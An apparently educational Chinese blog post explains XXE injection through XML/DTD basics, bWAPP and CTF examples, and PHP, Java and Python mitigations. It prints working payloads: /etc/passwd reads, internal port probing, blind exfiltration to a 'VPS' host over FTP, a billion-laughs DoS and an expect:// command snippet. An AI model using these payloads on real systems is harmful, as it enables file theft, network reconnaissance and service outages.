<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="题记学习了XXE漏洞,自己来总结一下,如果有什么写的不到位，不够好的地方，还请师傅们指出。 0x00 XXE漏洞XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可">
<meta property="og:type" content="article">
<meta property="og:title" content="浅谈XML实体注入漏洞">
<meta property="og:url" content="http://yoursite.com/2018/05/27/xxe学习/index.html">
<meta property="og:site_name" content="Hu3sky">
<meta property="og:description" content="题记学习了XXE漏洞,自己来总结一下,如果有什么写的不到位，不够好的地方，还请师傅们指出。 0x00 XXE漏洞XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/xxe/1.png">
<meta property="og:image" content="http://yoursite.com/xxe/2.png">
<meta property="og:image" content="http://yoursite.com/xxe/3.png">
<meta property="og:image" content="http://yoursite.com/xxe/4.png">
<meta property="og:image" content="http://yoursite.com/xxe/5.png">
<meta property="og:image" content="http://yoursite.com/xxe/6.png">
<meta property="og:image" content="http://yoursite.com/xxe/7.png">
<meta property="og:image" content="http://yoursite.com/xxe/8.png">
<meta property="og:image" content="http://yoursite.com/xxe/9.png">
<meta property="og:image" content="http://yoursite.com/xxe/10.png">
<meta property="og:image" content="http://yoursite.com/xxe/11.png">
<meta property="og:image" content="http://yoursite.com/xxe/12.png">
<meta property="og:image" content="http://yoursite.com/xxe/13.png">
<meta property="og:image" content="http://yoursite.com/xxe/17.png">
<meta property="og:image" content="http://yoursite.com/xxe/18.png">
<meta property="og:image" content="http://yoursite.com/shen/3.png">
<meta property="og:image" content="http://yoursite.com/shen/4.png">
<meta property="og:image" content="http://yoursite.com/shen/5.png">
<meta property="og:image" content="http://yoursite.com/xxe/15.png">
<meta property="og:image" content="http://yoursite.com/xxe/16.png">
<meta property="og:image" content="http://yoursite.com/xxe/14.png">
<meta property="og:updated_time" content="2018-06-21T16:08:14.504Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="浅谈XML实体注入漏洞">
<meta name="twitter:description" content="题记学习了XXE漏洞,自己来总结一下,如果有什么写的不到位，不够好的地方，还请师傅们指出。 0x00 XXE漏洞XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可">
<meta name="twitter:image" content="http://yoursite.com/xxe/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/05/27/xxe学习/"/>





  <title>浅谈XML实体注入漏洞 | Hu3sky</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
    <a href="https://github.com/Hu3sky/Hu3sky.github.io"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://s3.amazonaws.com/github/ribbons/forkme_right_white_ffffff.png" alt="Fork me on GitHub"></a>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hu3sky</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">神                羅               天               征</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-bomb"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-bolt"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-chess-rook"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-chess-queen"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-apple"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/05/27/xxe学习/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Hu3sky">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/ctf/头像.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hu3sky">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">浅谈XML实体注入漏洞</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-05-27T19:18:00+08:00">
                2018-05-27
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/xxe/" itemprop="url" rel="index">
                    <span itemprop="name">xxe</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="题记"><a href="#题记" class="headerlink" title="题记"></a>题记</h1><p>学习了XXE漏洞,自己来总结一下,如果有什么写的不到位，不够好的地方，还请师傅们指出。</p>
<h1 id="0x00-XXE漏洞"><a href="#0x00-XXE漏洞" class="headerlink" title="0x00 XXE漏洞"></a>0x00 XXE漏洞</h1><p>XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。</p>
<h1 id="0x01-XML"><a href="#0x01-XML" class="headerlink" title="0x01 XML"></a>0x01 XML</h1><p>既然说到XML，就先学习一波XML。</p>
<ul>
<li>XML被设计为传输和存储数据，其焦点是数据的内容。</li>
<li>HTML被设计用来显示数据，其焦点是数据的外观。<br>XML把数据从HTML分离，XML是独立于软件和硬件的信息传输工具。<br>基本语法：<ul>
<li>所有 XML 元素都须有关闭标签。</li>
<li>XML 标签对大小写敏感。</li>
<li>XML 必须正确地嵌套。</li>
<li>XML 文档必须有根元素。</li>
<li>XML 的属性值须加引号。</li>
<li>实体引用，这里看个例子，如果你把字符 “&lt;” 放在 XML，素中，会发生错误，这是因为解析器会把它当作新元素的开始。这样会产生XML错误：<br><code>&lt;message&gt;if salary &lt; 1000 then&lt;/message&gt;</code>,为了避免错误。我们用实体引用<code>&amp;lt;</code>来代替”&lt;”字符。XML中，有5个预定义的实体引用。<img src="/xxe/1.png" alt="1">。</li>
<li>XML中的注释，在XML中编写注释的语法与 HTML 的语法很相似。<code>&lt;!-- --&gt;</code></li>
<li>在 XML 中，空格会被保留,多个空格不会被合并为一个。</li>
</ul>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;bookstore&gt; &lt;!--根元素--&gt;</span><br><span class="line">&lt;book category=&quot;COOKING&quot;&gt; &lt;!--bookstore的子元素，category为属性--&gt;</span><br><span class="line">&lt;title&gt;Everyday Italian&lt;/title&gt;      &lt;!--book的子元素，lang为属性--&gt;</span><br><span class="line">&lt;author&gt;Giada De Laurentiis&lt;/author&gt;       &lt;!--book的子元素--&gt;</span><br><span class="line">&lt;year&gt;2005&lt;/year&gt; &lt;!--book的子元素--&gt;</span><br><span class="line">&lt;price&gt;30.00&lt;/price&gt; &lt;!--book的子元素--&gt;</span><br><span class="line">&lt;/book&gt; &lt;!--book的结束--&gt;</span><br><span class="line">&lt;/bookstore&gt; &lt;!--bookstore的结束--&gt;</span><br></pre></td></tr></table></figure>
<h1 id="0x02-DTD"><a href="#0x02-DTD" class="headerlink" title="0x02 DTD"></a>0x02 DTD</h1><p>文档类型定义（DTD）可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD可被成行地声明于XML文档中，也可作为一个外部引用。带有DTD的XML文档实例</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;?xml version=&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE note [&lt;!--定义此文档是 note 类型的文档--&gt;</span><br><span class="line">&lt;!ELEMENT note (to,from,heading,body)&gt;&lt;!--定义note元素有四个元素--&gt;</span><br><span class="line">&lt;!ELEMENT to (#PCDATA)&gt;&lt;!--定义to元素为”#PCDATA”类型--&gt;</span><br><span class="line">&lt;!ELEMENT from (#PCDATA)&gt;&lt;!--定义from元素为”#PCDATA”类型--&gt;</span><br><span class="line">&lt;!ELEMENT head (#PCDATA)&gt;&lt;!--定义head元素为”#PCDATA”类型--&gt;</span><br><span class="line">&lt;!ELEMENT body (#PCDATA)&gt;&lt;!--定义body元素为”#PCDATA”类型--&gt;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;note&gt;</span><br><span class="line">&lt;to&gt;Y0u&lt;/to&gt;</span><br><span class="line">&lt;from&gt;@re&lt;/from&gt;</span><br><span class="line">&lt;head&gt;v3ry&lt;/head&gt;</span><br><span class="line">&lt;body&gt;g00d!&lt;/body&gt;</span><br><span class="line">&lt;/note&gt;</span><br></pre></td></tr></table></figure>
<p><img src="/xxe/2.png" alt="2">当使用外部DTD时，通过如下语法引入。<br><code>&lt;!DOCTYPE root-element SYSTEM &quot;filename&quot;&gt;</code><br>外部DTD实例</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;?xml version=&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE root-element SYSTEM &quot;test.dtd&quot;&gt;</span><br><span class="line">&lt;note&gt;</span><br><span class="line">  &lt;to&gt;Y0u&lt;/to&gt;</span><br><span class="line">  &lt;from&gt;@re&lt;/from&gt;</span><br><span class="line">  &lt;head&gt;v3ry&lt;/head&gt;</span><br><span class="line">  &lt;body&gt;g00d!&lt;/body&gt;</span><br><span class="line">&lt;/note&gt;</span><br></pre></td></tr></table></figure>
<p>test.dtd：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;!ELEMENT to (#PCDATA)&gt;&lt;!--定义to元素为”#PCDATA”类型--&gt;</span><br><span class="line">&lt;!ELEMENT from (#PCDATA)&gt;&lt;!--定义from元素为”#PCDATA”类型--&gt;</span><br><span class="line">&lt;!ELEMENT head (#PCDATA)&gt;&lt;!--定义head元素为”#PCDATA”类型--&gt;</span><br><span class="line">&lt;!ELEMENT body (#PCDATA)&gt;&lt;!--定义body元素为”#PCDATA”类型--&gt;</span><br></pre></td></tr></table></figure>
<p><img src="/xxe/3.png" alt="3"><br>源码<br><img src="/xxe/4.png" alt="4"></p>
<ul>
<li>PCDATA的意思是被解析的字符数据。PCDATA是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。文本中的标签会被当作标记来处理，而实体会被展开。<img src="/xxe/5.png" alt="5">,不过，被解析的字符数据不应当包含任何&amp;，&lt;，或者&gt;字符，需要用<code>&amp;amp;</code> <code>&amp;lt;</code> <code>&amp;gt;</code>实体来分别替换</li>
<li>CDATA意思是字符数据，CDATA 是不会被解析器解析的文本，在这些文本中的标签不会被当作标记来对待，其中的实体也不会被展开。</li>
</ul>
<h2 id="DTD元素"><a href="#DTD元素" class="headerlink" title="DTD元素"></a>DTD元素</h2><p><img src="/xxe/6.png" alt="6"></p>
<h2 id="DTD属性"><a href="#DTD属性" class="headerlink" title="DTD属性"></a>DTD属性</h2><p>属性声明使用以下语法<br><code>&lt;!ATTLIST 元素名称 属性名称 属性类型 默认值&gt;</code><br>DTD实例<br><code>&lt;!ATTLIST payment hu3sky CDATA &quot;H&quot;&gt;</code><br>XML实例<br><code>&lt;payment hu3sky=&quot;H&quot; /&gt;</code><br>以下是属性类型的选项<br><img src="/xxe/7.png" alt="7"><br>默认值参数可以使用下列值:<br><img src="/xxe/8.png" alt="8"></p>
<h2 id="DTD-实体-重要"><a href="#DTD-实体-重要" class="headerlink" title="DTD-实体(重要)"></a>DTD-实体(重要)</h2><p>实体是用于定义引用普通文本或特殊字符的快捷方式的变量。<br>实体引用是对实体的引用。<br>实体可以在内部或外部进行声明<br><img src="/xxe/9.png" alt="9"></p>
<h3 id="内部实体"><a href="#内部实体" class="headerlink" title="内部实体"></a>内部实体</h3><p><code>&lt;!ENTITY 实体名称 &quot;实体的值&quot;&gt;</code></p>
<h3 id="外部实体"><a href="#外部实体" class="headerlink" title="外部实体"></a>外部实体</h3><p><code>&lt;!ENTITY 实体名称 SYSTEM &quot;URL&quot;&gt;</code></p>
<h3 id="参数实体"><a href="#参数实体" class="headerlink" title="参数实体"></a>参数实体</h3><p><code>&lt;!ENTITY %实体名称 &quot;值&quot;&gt;</code><br>or<br><code>&lt;!ENTITY %实体名称 SYSTEM &quot;URL&quot;&gt;</code></p>
<p><em>内部实体</em>例子</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;?xml version=&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE note[</span><br><span class="line">	&lt;!ELEMENT note (name)&gt;</span><br><span class="line">	&lt;!ENTITY hack3r &quot;Hu3sky&quot;&gt;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;note&gt;</span><br><span class="line"> &lt;name&gt;&amp;hack3r;&lt;/name&gt;</span><br><span class="line">&lt;/note&gt;</span><br></pre></td></tr></table></figure>
<p>结果<img src="/xxe/10.png" alt="10"></p>
<p><em>参数实体+外部实体</em></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE a [</span><br><span class="line">    &lt;!ENTITY % name SYSTEM &quot;file:///etc/passwd&quot;&gt;</span><br><span class="line">    %name;</span><br><span class="line">]&gt;</span><br></pre></td></tr></table></figure>
<p><code>%name</code>(参数实体)是在DTD中被引用的，而<code>&amp;name;</code>是在xml文档中被引用的。<br>XXE主要是利用了DTD引用外部实体导致的漏洞。</p>
<h1 id="0x03-攻击思路"><a href="#0x03-攻击思路" class="headerlink" title="0x03 攻击思路"></a>0x03 攻击思路</h1><ol>
<li>引用外部实体远程文件读取</li>
<li>Blind XXE</li>
<li>DoS</li>
</ol>
<h2 id="外部实体引用-有回显"><a href="#外部实体引用-有回显" class="headerlink" title="外部实体引用,有回显"></a>外部实体引用,有回显</h2><h3 id="读取任意文件"><a href="#读取任意文件" class="headerlink" title="读取任意文件"></a>读取任意文件</h3><h4 id="例子一"><a href="#例子一" class="headerlink" title="例子一"></a>例子一</h4><p>这里我用bWAPP平台上的一道XXE的题目来说明<br>题目是这样的，我们点击这个按钮然后抓包看看<img src="/xxe/11.png" alt="11">。<img src="/xxe/12.png" alt="12">可以看到xxe-1.php页面以POST方式向xxe-2.php页面传输了XML数据，既然是XML数据，我们就可以自己增加一个恶意外部实体然后再原本的XML数据中进行实体调用，来进行XXE攻击，如下：<br><img src="/xxe/13.png" alt="13"><br>可以看到，成功的读取了robots.txt中的内容，这里的hu3sky是我们定义的一个外部实体。</p>
<p>为了更好理解原理，我们来看一看xxe-2.php的源码。<br>主要代码在这。<img src="/xxe/17.png" alt="17">可以看到这里直接用了<code>simplexml_load_string()</code> ，simplexml_load_string() 函数的作用是把XML 字符串载入对象中。函数获取xml内容，并没有做任何过滤，$login获取login标签里的内容，最后拼接到$message<img src="/xxe/18.png" alt="18"></p>
<h4 id="例子二"><a href="#例子二" class="headerlink" title="例子二"></a>例子二</h4><p>jarvisoj上的一道题目API调用<br>这道题的题目说明是 请设法获得目标机器/home/ctf/flag.txt中的flag值。<br>进入题目 <a href="http://web.jarvisoj.com:9882/" target="_blank" rel="noopener">http://web.jarvisoj.com:9882/</a> 发现一个输入框，我们对其进行抓包<img src="/shen/3.png" alt="3">发现了json数据，修改发现可以被解析<img src="/shen/4.png" alt="4">。一开始没有思路，后来看了wp，发现是要把json处改为xml。所以就知道了，这题是xxe。修改json处，构造一个xml表单进行xml注入，得到flag。<img src="/shen/5.png" alt="5"></p>
<h3 id="检测内网端口"><a href="#检测内网端口" class="headerlink" title="检测内网端口"></a>检测内网端口</h3><p>有回显时，直接发送payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;</span><br><span class="line"></span><br><span class="line">&lt;!DOCTYPE XXE [</span><br><span class="line"></span><br><span class="line">&lt;!ELEMENT name ANY &gt;</span><br><span class="line"></span><br><span class="line">&lt;!ENTITY XXE SYSTEM &quot;http://127.0.0.1:80&quot; &gt;]&gt;</span><br><span class="line"></span><br><span class="line">&lt;root&gt;</span><br><span class="line"></span><br><span class="line">&lt;name&gt;&amp;XXE;&lt;/name&gt;</span><br><span class="line"></span><br><span class="line">&lt;/root&gt;</span><br></pre></td></tr></table></figure>
<p>当我们检测80端口时，80端口开放，这时会返回页面报错信息(记得url编码。因为页面会解码一次)，如下：<br><img src="/xxe/15.png" alt="15"><br>当我们检测3389端口，3389端口未开放，端口未开放时返回情况如下：<br><img src="/xxe/16.png" alt="16"></p>
<h2 id="Blind-XXE"><a href="#Blind-XXE" class="headerlink" title="Blind XXE"></a>Blind XXE</h2><p>如果服务器没有回显，只能使用Blind XXE漏洞来构建一条外带数据(OOB)通道来读取数据。</p>
<p>所以，在没有回显的情况下如何来利用XXE<br><img src="/xxe/14.png" alt="14"><br>思路：</p>
<ol>
<li>客户端发送payload 1给web服务器</li>
<li>web服务器向vps获取恶意DTD，并执行文件读取payload2</li>
<li>web服务器带着回显结果访问VPS上特定的FTP或者HTTP</li>
<li>通过VPS获得回显（nc监听端口）</li>
</ol>
<p>本地客户端(payload 1 )</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE root [&lt;!ENTITY % remote SYSTEM &quot;http://vps/test.xml&quot;&gt; %remote;]&gt;</span><br></pre></td></tr></table></figure>
<p>由于web端会解码，所以需要我们先html实体编码一次</p>
<p>payload 2 也就是test.xml的内容(VPS)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % payload SYSTEM &quot;file:///etc/passwd&quot;&gt;</span><br><span class="line">&lt;!ENTITY % int &quot;&lt;!ENTITY % trick SYSTEM &apos;ftp://VPS:21/%payload;&apos;&gt;&quot;&gt;</span><br><span class="line">%int;</span><br><span class="line">%trick;</span><br></pre></td></tr></table></figure>
<p>这个是先将SYSTEM的file协议读取到的内容赋值给参数实体%payload，第二步是一个实体嵌套，trick是远程访问ftp协议所携带的内容</p>
<h2 id="DOS"><a href="#DOS" class="headerlink" title="DOS"></a>DOS</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot;?&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    &lt;!DOCTYPE lolz [</span><br><span class="line"></span><br><span class="line"> &lt;!ENTITY lol &quot;lol&quot;&gt;</span><br><span class="line"></span><br><span class="line"> &lt;!ENTITY lol2 &quot;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&quot;&gt;</span><br><span class="line"></span><br><span class="line"> &lt;!ENTITY lol3 &quot;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&quot;&gt;</span><br><span class="line"></span><br><span class="line"> &lt;!ENTITY lol4 &quot;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&quot;&gt;</span><br><span class="line"></span><br><span class="line"> &lt;!ENTITY lol5 &quot;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&quot;&gt;</span><br><span class="line"></span><br><span class="line"> &lt;!ENTITY lol6 &quot;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&quot;&gt;</span><br><span class="line"></span><br><span class="line"> &lt;!ENTITY lol7 &quot;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&quot;&gt;</span><br><span class="line"></span><br><span class="line"> &lt;!ENTITY lol8 &quot;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&quot;&gt;</span><br><span class="line"></span><br><span class="line"> &lt;!ENTITY lol9 &quot;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&quot;&gt;</span><br><span class="line"></span><br><span class="line"> ]&gt;</span><br><span class="line"> </span><br><span class="line"> &lt;lolz&gt;&amp;lol9;&lt;/lolz&gt;</span><br></pre></td></tr></table></figure>
<h2 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h2><p>php环境下，xml命令执行需要php装有expect扩展，但是该扩展默认没有安装，所以一般来说，比较难利用，这里就只给出代码了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">$xml = &lt;&lt;&lt;EOF</span><br><span class="line">&lt;?xml version = &quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE ANY [</span><br><span class="line">    &lt;!ENTITY f SYSTEM &quot;except://ls&quot;&gt;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;x&gt;&amp;f;&lt;/x&gt;</span><br><span class="line">EOF;</span><br><span class="line">$data = simplexml_load_string($xml);</span><br><span class="line">print_r($data);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>这个的原理就是递归引用,lol 实体具体还有 “lol” 字符串，然后一个 lol2 实体引用了 10 次 lol 实体，一个 lol3 实体引用了 10 次 lol2 实体，此时一个 lol3 实体就含有 10^2 个 “lol” 了，以此类推，lol9 实体含有 10^8 个 “lol” 字符串,最后再引用lol9。</p>
<h1 id="0x04-防御XXE"><a href="#0x04-防御XXE" class="headerlink" title="0x04 防御XXE"></a>0x04 防御XXE</h1><h2 id="使用开发语言提供的禁用外部实体的方法"><a href="#使用开发语言提供的禁用外部实体的方法" class="headerlink" title="使用开发语言提供的禁用外部实体的方法"></a>使用开发语言提供的禁用外部实体的方法</h2><p>PHP:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">libxml_disable_entity_loader(true);</span><br></pre></td></tr></table></figure>
<p>JAVA:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();</span><br><span class="line">dbf.setExpandEntityReferences(false);</span><br></pre></td></tr></table></figure>
<p>Python:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">from lxml import etree</span><br><span class="line">xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))</span><br></pre></td></tr></table></figure>
